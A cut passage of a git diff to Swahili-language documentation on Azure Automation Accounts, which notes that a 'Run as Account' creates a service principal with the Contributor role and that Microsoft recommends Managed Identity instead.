docs:](https://learn.microsoft.com/en-us/azure/automation/overview) Azure Automation inatoa huduma ya automation ya msingi ya wingu, masasisho ya mfumo wa uendeshaji, na huduma ya usanidi inayounga mkono usimamizi thabiti katika mazingira yako ya Azure na yasiyo ya Azure. Inajumuisha automation ya mchakato, usimamizi wa usanidi, usimamizi wa masasisho, uwezo wa pamoja, na vipengele tofauti. Hizi ni kama "**scheduled tasks**" katika Azure ambazo zitakuruhusu kutekeleza mambo (vitendo au hata scripts) ili **kusimamia**, kuangalia na kuunda **mazingira ya Azure**. ### Run As Account -Wakati **Run as Account** inatumika, inaunda **application** ya Azure AD yenye cheti kilichojisaini yenyewe, inaunda **service principal** na inatoa jukumu la **Contributor** kwa akaunti katika **subscription** ya sasa (privileges nyingi).\ +Wakati **Run as Account** inatumika, inaunda **application** ya Azure AD yenye cheti kilichojisaini, inaunda **service principal** na inatoa jukumu la **Contributor** kwa akaunti katika **subscription** ya sasa (privileges nyingi).\ Microsoft inapendekeza kutumia **Managed Identity** kwa Akaunti ya Automation. > [!WARNING] @@ -29,16 +29,16 @@ Nenda kwa `Automation Accounts` --> `